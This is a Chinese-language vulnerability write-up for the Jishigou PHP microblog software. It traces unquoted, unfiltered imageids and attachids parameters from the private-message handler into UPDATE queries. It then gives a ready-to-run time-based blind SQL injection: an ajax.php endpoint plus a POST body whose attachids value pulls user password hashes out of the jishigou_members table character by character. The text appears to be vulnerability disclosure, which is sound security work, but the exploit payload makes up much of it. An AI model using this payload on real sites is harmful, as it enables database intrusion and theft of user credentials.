测试版本: 20140124
1.分析:
文件名:pm.mod.php
..........以上省略 .......... load::logic('pm'); $PmLogic = new PmLogic(); $pmid = $this->Post['pmid']; if($che = $this->Post['che']){ $this->Post['to_user'] = implode(",",$che); //发送的账号名 } $this->Post['message'] = jpost('message', 'txt'); //内容 if($pmid > 0){ $return = $PmLogic->pmSendAgain($this->Post); }else{ $return = $PmLogic->pmSend($this->Post); //不设置pmid值的话进到pmSend函数里 我们进去看看 } ..........以下省略 ..........
//master.mod.php
$this->Get = &$_GET;
$this->Post = &$_POST;
--------------------------------------------------
文件名:pm.logic.php
..........以上省略 .......... $to_user_list=array(); . .........中间省略 .......... foreach($to_user_list as $to_user_id => $to_user_name) { $data = array( "msgfrom" =>$susername, "msgnickname"=>$snickname, "msgfromid" =>$suid, "msgto" => $to_user_name['username'], "tonickname" => $to_user_name['nickname'], "msgtoid" => $to_user_id, 'imageids' => $post['imageids'], 'attachids' => $post['attachids'], // "subject" => $post['subject'], post的值是由pm.mod.php传过来的 我们继续往下看 "message" => $post['message'], / "new"=>'1', "dateline"=>$time, ); . .........中间省略 .......... #标记音乐和附件,使清缓存的时候不会把附件删除 if($data['imageids']){ DB::query("update `".TABLE_PREFIX."topic_image` set `tid` = -1 where `id` in ({$data['imageids']})"); //没有使用单引号 ,也没过滤变量直接入口了 } if($data['attachids']){ DB::query("update `".TABLE_PREFIX."topic_attach` set `tid` = -1 where `id` in ({$data['attachids']})"); //没有使用单引号 ,也没过滤变量直接入库了 }
由于程序在 SQL 执行报错时只会把错误信息记录到文件里、不会回显给客户端，所以这里只能采用盲注的方式。
2.利用 :
需要在已登录的情况下进行
ajax.php?mod=pm&code=do_add
POST提交
to_user=admin&message=eeeeeeeeeeeeeeeeeeeeee&save_to_outbox=0&imageids=1&attachids=SELECT IF(ASCII(MID(PASSWORD,1 ,1)) = 48, NULL, SLEEP(1)) FROM jishigou_members
实际执行的 SQL 语句:
update `jishigou_topic_attach` set `tid` = -1 where `id` in (SELECT IF(ASCII(MID(PASSWORD,1 ,1)) = 48, NULL, SLEEP(1)) FROM jishigou_members)